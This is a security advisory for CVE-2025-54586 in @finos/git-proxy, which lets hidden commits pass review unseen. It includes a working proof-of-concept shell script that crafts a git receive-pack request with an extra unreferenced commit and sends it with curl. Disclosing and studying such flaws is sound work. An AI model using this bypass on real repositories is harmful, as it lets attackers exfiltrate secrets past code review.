logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2025-54586 @finos/git-proxy

Package

Manager: npm
Name: @finos/git-proxy
Vulnerable Version: >=0 <1.19.2

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N

EPSS: 0.00034 pctl0.07917

Details

GitProxy Hidden Commits Injection ### Summary An attacker can inject extra commits into the pack sent to GitHub, commits that aren’t pointed to by any branch. Although these “hidden” commits never show up in the repository’s visible history, GitHub still serves them at their direct commit URLs. This lets an attacker exfiltrate sensitive data without ever leaving a trace in the branch view. We rate this a High‑impact vulnerability because it completely compromises repository confidentiality. ### Details The proxy currently trusts only the ref‑update line (`oldOid → newOid`) and doesn't inspect the packfile’s contents Because the code only runs `git rev-list oldOid..newOid` to compute **introducedCommits** but **never** checks which commits actually arrived in the pack, a malicious client can append extra commits. Those “hidden” commits won’t be pointed to by any branch but GitHub still stores and serves them by SHA. <img width="2556" height="744" alt="Screenshot 2025-07-16 at 12 29 19" src="https://github.com/user-attachments/assets/abf459a9-310b-4819-a989-797c7e871790" /> ### PoC #### Prerequisites - A GitHub Personal Access Token stored in `~/.github-test-pat`. - A test repository also registered in git-proxy, e.g. `your-org/test-repo.git`, to which you have push rights. #### 1. Prepare the “visible” and “hidden” commits ```bash # Clone the test repository git clone http://localhost:8000/your-org/test-repo.git cd test-repo # 1. Record the original HEAD ORIG_COMMIT=$(git rev-parse HEAD) # 2. Create branch 'foo' and add a visible commit git checkout -b foo echo "visible commit" >> file.txt git add file.txt git commit -m "Visible commit" VISIBLE_COMMIT=$(git rev-parse HEAD) # 3. Go back to the original commit and create a hidden-branch git checkout $ORIG_COMMIT git checkout -b hidden-branch echo "hidden change" > hidden.txt git add hidden.txt git commit -m "Hidden commit" HIDDEN_COMMIT=$(git rev-parse HEAD) # Return to 'foo' git checkout foo ``` #### 2. Push only the visible commit to branch `foo` ```bash git push --set-upstream origin foo # An authorized user approves this push via your normal review workflow ``` #### 3. Build and push a pack containing the hidden commit Create a script named `upload-pack.sh` (replace the placeholder variables with the SHAs you recorded above): ```bash #!/usr/bin/env bash REMOTE_URL="http://localhost:8000/your-org/test-repo.git" REF_NAME="refs/heads/foo" ORIG_COMMIT="<<ORIG_COMMIT>>" NEW_COMMIT="<<VISIBLE_COMMIT>>" OLD_COMMIT="0000000000000000000000000000000000000000" HIDDEN_COMMIT="<<HIDDEN_COMMIT>>" # 1. List all objects for the visible and hidden commits git rev-list --objects --no-object-names "^${ORIG_COMMIT}" ${NEW_COMMIT} > objects.txt git rev-list --objects --no-object-names "^${ORIG_COMMIT}" ${HIDDEN_COMMIT} >> objects.txt # 2. Pack them into a single packfile cat objects.txt git pack-objects --stdout < objects.txt > packfile # 3. Construct the Git smart‑protocol update header printf "${OLD_COMMIT} ${NEW_COMMIT} ${REF_NAME}\0 report-status-v2 side-band-64k object-format=sha1 agent=git/2.39.5" > update_line UPDATE_LINE_LEN="$(wc -c < update_line)" printf "%04x" $((UPDATE_LINE_LEN + 4)) > output cat update_line >> output # Git smart protocol expects a flush packet PKT_FLUSH="0000" printf "%s" "${PKT_FLUSH}" >> output # Append the packfile cat packfile >> output # 4. Send the malicious push via curl curl -u ${USER}:"$(<~/.github-test-pat)" \ -X POST "${REMOTE_URL}/git-receive-pack" \ -H "Content-Type: application/x-git-receive-pack-request" \ -H "Accept: application/x-git-receive-pack-result" \ --user-agent "git/2.42.0" \ --data-binary @output | cat -v ``` Make it executable: ```bash chmod +x upload-pack.sh ``` Run it: ```bash ./upload-pack.sh ``` #### 4. Verify the hidden commit Open in your browser (or via `curl`): ``` https://github.com/your-org/test-repo/commit/<<HIDDEN_COMMIT>> ``` You will see the **“Hidden commit”**, even though it is not referenced by any branch. ### Impact - **Data Exfiltration (Confidentiality breach):** Attackers can inject secrets, credentials, or proprietary data into any repository they push to via git-proxy. - **Undetectable in UI:** Since the hidden commits never appear in branch graphs, standard code review will not surface them. - **Persistence Window:** GitHub retains unreferenced objects for a period long enough to allow automated retrieval before garbage‑collecting them.

Metadata

Created: 2025-07-30T16:40:40Z
Modified: 2025-07-31T12:02:22Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-v98g-8rqx-g93g/GHSA-v98g-8rqx-g93g.json
CWE IDs: ["CWE-200"]
Alternative ID: GHSA-v98g-8rqx-g93g
Finding: F017
Auto approve: 1